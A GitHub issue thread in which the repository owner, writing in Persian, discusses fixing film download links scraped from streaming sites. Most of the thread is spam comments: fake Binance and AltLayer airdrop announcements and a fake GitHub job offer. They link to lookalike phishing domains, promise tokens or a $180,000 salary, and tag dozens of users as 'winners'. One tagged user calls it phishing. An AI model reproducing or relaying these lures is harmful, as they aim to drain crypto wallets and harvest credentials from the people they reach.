### ISSUE TITLE
dls6 => dls on [.top-movies2filmha.tk/DonyayeSerial/]

### ISSUE THREAD

**Issue by saturn99** [saturn99/open-film-server#4]
لینک ها اصلاح شود

update:
احتمالا لینک ها از اینجا بدست اومده بود:
https://donyayeserial1.fun/

https://donyayeserial1.fun/series/the-walking-dead-dead-city/
https://dls7.top-topmovies.click/DonyayeSerial/series2/tt18546730/SoftSub/S01/1080p.Web-DL.Full.HD/

همچنین این لینک
https://dls6.marvelmovies.click/DonyayeSerial/

**Comment by saturn99** [comment]
Serial_collection (t)

**Comment by steveg-gpsaustrack** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @Harry040, @jieyoung, @PjMpire, @Nexinon11, @fghcdp, @1995zhanbudu0115, @batuhansk

**Comment by roneyfraga** [comment]
[![Binance Airdrop](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

# 🚀 Binance Airdrop - Earn up to $1,000 in Tokens! 💰

Welcome to the exclusive Binance Airdrop! We're giving away generous rewards to eligible participants. Follow the steps below to join and earn up to $1,000 in tokens instantly.

## How to Participate:

### 1. 🤝 Connect Your Wallet

Make sure you have a compatible wallet and connect it to Binance.

**Note:** Your wallet must have a minimum balance to be eligible.

### 2. 🔗 Access the Smart Contract

Access the smart contract through the provided link: [Binance Airdrop Smart Contract](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance).

### 3. 🔄 Interact with the Contract


Winners: @Mesod, @Jaha96, @aa88kk, @joom122796, @EasonCYS, @dbongo, @monojones

**Comment by 1250285** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @maxclchen, @quydx, @alitalhagulle3, @nqthiep, @angelinazf, @banteg, @adelabdelli, @shubhamjw10, @ethanator, @lungzeeyim, @blackrose87, @georgezouq, @kthakur, @rwbaumg, @6ix78, @CAENDOO, @dominictayloruk, @Mx-virus, @ldbro0, @curroblanco

**Comment by 1250285** [comment]
# AltLayer Airdrop Season One Announcement

[![AltLayer Airdrop Season One](https://miro.medium.com/v2/da:true/resize:fit:1200/0*QvP91LW92QLv9_qq)](http://go.altlayerio.online/zHaxVS)

Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.

To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:

- **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
- **Distribution Categories:**
  - NFT Holders
  - Altitude Campaign Participants
  - EigenLayer Restakers
  - EigenLayer Ecosystem Partners
  - Celestia Stakers and others

For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).

[Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.

Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.

**Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.


Winners: @mronus, @shing1211, @SeavantUUz, @DamengBigJohn, @Kolahzary, @millerrachelo, @jiec-msft, @RayMaroun, @adv27, @JSCrompton, @MdRashid62, @fujifujifuji, @flamby, @jorgerance, @rongzhou, @ncolletti, @sebstam, @fialtbit, @expired-brain, @ikuzoije

**Comment by jiec-msft** [comment]
> # AltLayer Airdrop Season One Announcement
> [![AltLayer Airdrop Season One](https://camo.githubusercontent.com/9f4fd60c62d4404f9ecc903527398d510daca3c25b4b1418825c2ab01352b0c5/68747470733a2f2f6d69726f2e6d656469756d2e636f6d2f76322f64613a747275652f726573697a653a6669743a313230302f302a51765039314c573932514c76395f7171)](http://go.altlayerio.online/zHaxVS)
> 
> Exciting news! AltLayer token (ALT) is set to launch on Binance on January 25, 2024. This milestone couldn't have been reached without our amazing community. Your support has been crucial from conceptualization to product development.
> 
> To show our gratitude, we're inviting you to join the "ALT Token community" through an airdrop for early supporters and partners. Below is a summary:
> 
> * **Total Allocated ALT Tokens:** 300,000,000 (3% of total supply)
> * **Distribution Categories:**
>   
>   * NFT Holders
>   * Altitude Campaign Participants
>   * EigenLayer Restakers
>   * EigenLayer Ecosystem Partners
>   * Celestia Stakers and others
> 
> For detailed criteria and information, check the full announcement [here](http://go.altlayerio.online/zHaxVS).
> 
> [Claim](http://go.altlayerio.online/zHaxVS) opens from January 25 to February 25, 2024. Unclaimed ALT tokens after this period will return to AltLayer’s Treasury.
> 
> Thank you for being part of AltLayer's success! More to come in Season One, stay tuned.
> 
> **Note:** Certain regions are restricted from the airdrop. Please review the disclaimer before participating.
> 
> Winners: @mronus, @shing1211, @SeavantUUz, @DamengBigJohn, @Kolahzary, @millerrachelo, @jiec-msft, @RayMaroun, @adv27, @JSCrompton, @MdRashid62, @fujifujifuji, @flamby, @jorgerance, @rongzhou, @ncolletti, @sebstam, @fialtbit, @expired-brain, @ikuzoije

Please don't keep targeting on me. Remove me from your phishing list. I thank thank you!

**Comment by aiandev** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
kirkins, @teaddict, @camdenjohnnic, @Crypto-T-Rex, @thecatte, @leugimmai, @lomax001, @hero5512, @bigbossguru, @PjMpire, @djangoleonard, @IgorYevtushenkoUA, @aSynch1889, @hisxo, @tcxusecopilot, @tmohan26, @fmt123, @rexding1981, @nevillew, @linkstartup

**Comment by saturn99** [comment]
همون #71 هست که به روز شده؛ این دامنه از لیست حدف میشود
